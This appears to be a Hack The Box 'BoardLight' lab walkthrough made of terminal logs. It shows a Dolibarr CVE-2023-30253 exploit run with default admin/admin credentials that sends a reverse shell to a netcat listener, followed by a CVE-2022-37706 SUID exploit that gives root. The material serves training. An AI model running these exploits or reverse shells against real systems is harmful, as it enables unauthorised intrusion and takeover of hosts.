└──╼ [★]$ nmap -sV 10.10.11.11
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 06:53 CDT
Nmap scan report for 10.10.11.11
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds
└──╼ [★]$ echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts
10.10.11.11 crm.board.htb
Visiting crm.board.htb in a browser shows a login page:

The page title is Dolibarr; a quick search shows what it is:
Dolibarr ERP CRM is an open source, free software package for companies of any size, foundations or freelancers. It includes different features for enterprise resource planning (ERP) and customer relationship management (CRM) but also other features for different activities.
Login/password of Dolibarr ERP & CRM:
- If you did not change it, login is admin and password is the same as the one sent by email for your dashboard access, once your instance was created. Take a look into your message box to retrieve it. EMail topic should start with “Welcome to Dolicloud”.
---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---
positional arguments:
  hostname    Target hostname
  username    Username of Dolibarr ERP/CRM
  password    Password of Dolibarr ERP/CRM
  lhost       Listening host for reverse shell
  lport       Listening port for reverse shell

options:
  -h, --help  show this help message and exit

┌─[sg-vip-2]─[10.10.14.22]─[kazma@htb-jejtlehtvs]─[~/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└──╼ [★]$ python3 exploit.py http://crm.board.htb admin admin 10.10.14.22 4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell...
Press Ctrl+C after successful connection
Reverse shell:
└──╼ [★]$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.11.11] 44222
bash: cannot set terminal process group (893): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$
└──╼ [★]$ ssh larissa@10.10.11.11
The authenticity of host '10.10.11.11 (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.11' (ED25519) to the list of known hosts.
larissa@10.10.11.11's password:
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
larissa@boardlight:~$ vi exploit.sh
larissa@boardlight:~$ chmod +x exploit.sh
larissa@boardlight:~$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
# find / -name "root.txt"
/root/root.txt